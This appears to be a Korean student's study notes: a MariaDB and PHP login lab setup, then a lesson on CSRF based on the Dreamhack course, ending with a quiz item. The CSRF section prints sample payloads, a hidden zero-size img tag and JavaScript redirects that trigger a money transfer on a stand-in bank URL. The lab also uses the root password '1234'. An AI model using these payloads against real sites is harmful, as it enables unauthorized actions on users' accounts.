MobaXterm으로 돌아가서 아래의 명령어 삽입

systemctl enable mariadb 

systemctl enable mariadb 명령은 MariaDB 데이터베이스 서버를 시스템 부팅 시 자동으로 시작하도록 설정하는 명령입니다. 이 명령을 실행하면, MariaDB 서비스가 시스템이 부팅될 때마다 자동으로 시작됩니다.

mysql -u root -p

mysql -u root -p 명령은 MySQL 또는 MariaDB 데이터베이스에 root 사용자로 로그인하기 위한 명령입니다. 이 명령을 실행하면 비밀번호를 입력하라는 프롬프트가 나타납니다.

비밀번호 입력 1234

이제 본격적으로 database를 만들 예정

phpMyAdmin 창으로 되돌아가서 데이터베이스 -> 데이터베이스 이름 user 로 만들기

아래 사진을 보고 따라하기

• use user
• show columns from user;

아래와 같이 3개의 필드가 완성된 것을 명령어를 통해서도 확인이 가능함

삽입 버튼을 눌러서 관리자 계정을 하나 생성

관리자 계정이 잘 생성 되었는지 확인

select * from user; 

vi /var/www/html/login_check.php 명령어를 사용하여 삽입을 시도하면 글자가 깨져서 나오는 에러 발생

• download -> source -> 생성해야하는 4개의 php 파일 메모장으로 열기 -> 텍스트 전체 복사 -> 

cat > logincheck.php  -> 복사한 텍스트 붙여넣기 -> ctrl +D (저장)  4번 반복

제대로 php 파일을 생성했는지 'ls' 명령어를 통해 확인

웹브라우저에 192.168.1.136/index.php 를 입력하면 아래와 같은 창이 나와야 함

최종적으로, 설정한 관리자 아이디 비밀번호를 적고 로그인하면 아래처럼 로그인이 성공하여야 함

Cross Site Request Forgery (CSRF)  임의 이용자의 권한으로 임의 주소에 HTTP 요청을 보낼 수 있는 취약점

Example.

이용자의 계정으로 임의 금액을 송금해 금전적인 이득을 취하거나 비밀번호를 변경해 계정을 탈취하고, 관리자 계정을 공격해 공지사항 작성 등으로 혼란을 야기합니다.

CSRF 공격에 성공하기 위해서는 공격자가 작성한 악성 스크립트를 이용자가 실행해야 합니다.

 ** 위에서 말하는 악성 스크립트는 HTTP 요청을 보내는 코드

CSRF 공격 스크립트는 HTML 또는 Javascript를 통해 작성할 수 있습니다. 아래 사진 및 코드는 HTML으로 작성한 스크립트의 예시입니다.

이미지를 불러오는 img 태그를 사용하거나 웹 페이지에 입력된 양식을 전송하는 form 태그를 사용하는 방법이 있습니다. 이 두 개의 태그를 사용해 HTTP 요청을 보내면 HTTP 헤더인 Cookie에 이용자의 인증 정보가 포함됩니다.

아래 코드는 img 태그를 사용한 스크립트의 예시입니다. 해당 태그는 이미지의 크기를 줄일 수 있는 옵션을 제공합니다. 이를 활용하면 이용자에게 들키지않고 임의 페이지에 요청을 보낼 수 있습니다.

<img src='http://bank.dreamhack.io/sendmoney?to=Dreamhack&amount=1337' width=0px height=0px>

아래 코드는 Javascript로 작성된 스크립트의 예시입니다. 새로운 창을 띄우고, 현재 창의 주소를 옮기는 등의 행위가 가능합니다.

/* 새 창 띄우기 */
window.open('http://bank.dreamhack.io/sendmoney?to=Dreamhack&amount=1337');
/* 현재 창 주소 옮기기 */
location.href = 'http://bank.dreamhack.io/sendmoney?to=Dreamhack&amount=1337';
location.replace('http://bank.dreamhack.io/sendmoney?to=Dreamhack&amount=1337');

XSS와 CSRF는 스크립트를 웹 페이지에 작성해 공격한다는 점에서 매우 유사합니다. 

두 개의 취약점은 모두 클라이언트를 대상으로 하는 공격이며, 이용자가 악성 스크립트가 포함된 페이지에 접속하도록 유도해야 합니다

//차이점 

- XSS는 인증 정보인 세션 및 쿠키 탈취를 목적으로 하는 공격이며, 공격할 사이트의 오리진에서 스크립트를 실행시킵니다.

- CSRF는 이용자가 임의 페이지에 HTTP 요청을 보내는 것을 목적으로 하는 공격입니다. 또한, 공격자는 악성 스크립트가 포함된 페이지에 접근한 이용자의 권한으로 웹 서비스의 임의 기능을 실행할 수 있습니다.

Q1. 서버에서 이용자를 식별하기 위해 쿠키를 사용하고 있어야 CSRF 취약점으로 공격할 수 있다.

O

X

dreamhack web hacking 강의를 기반으로 작성되었습니다.